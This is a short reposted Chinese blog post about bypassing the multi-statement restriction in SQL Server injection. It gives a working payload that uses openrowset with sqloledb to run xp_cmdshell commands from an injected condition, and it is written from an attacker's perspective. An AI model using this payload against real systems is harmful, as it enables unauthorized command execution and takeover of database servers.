SQL注入不能多句执行时的一种突破方法(SA权限)
生活随笔
收集整理的這篇文章主要介紹了
SQL注入不能多句执行时的一种突破方法(SA权限)
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
?有時(shí)候會(huì)遇到SA權(quán)限不能多句執(zhí)行的情況,讓人很蛋疼。
前幾天在搞一個(gè)SQL SERVER 7.0的PUBLIC權(quán)限時(shí)。
某牛給我以下語(yǔ)句提權(quán)
本機(jī)測(cè)試成功。
但實(shí)際環(huán)境中卻出現(xiàn)[微軟](méi) [ODBC SQL Server驅(qū)動(dòng)] [SQL Server中] OLE DB提供程序'sqloledb'無(wú)法創(chuàng)建一個(gè)接口 的錯(cuò)誤。原因不明,還望哪位大牛解釋。。
雖然這個(gè)問(wèn)題偶還沒(méi)有解決,但今天遇到一個(gè)SA權(quán)限不能多句的情況(估計(jì)驅(qū)動(dòng)問(wèn)題,不解),讓我蛋疼了一段時(shí)間。
后來(lái)經(jīng)過(guò)GOOGLE,發(fā)現(xiàn)SA權(quán)限還可以這樣執(zhí)行 and 0<>(select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:'''))
這樣就繞過(guò)了多句執(zhí)行的限制了。
估計(jì)大牛們?cè)缇蜁?huì)了呃:)
轉(zhuǎn)載于:https://blog.51cto.com/pnig0s1992/487233
《新程序員》:云原生和全面數(shù)字化實(shí)踐50位技術(shù)專(zhuān)家共同創(chuàng)作,文字、視頻、音頻交互閱讀總結(jié)
以上是生活随笔為你收集整理的SQL注入不能多句执行时的一种突破方法(SA权限)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Java异常设计
- 下一篇: SugarCRM 主表-自定义字段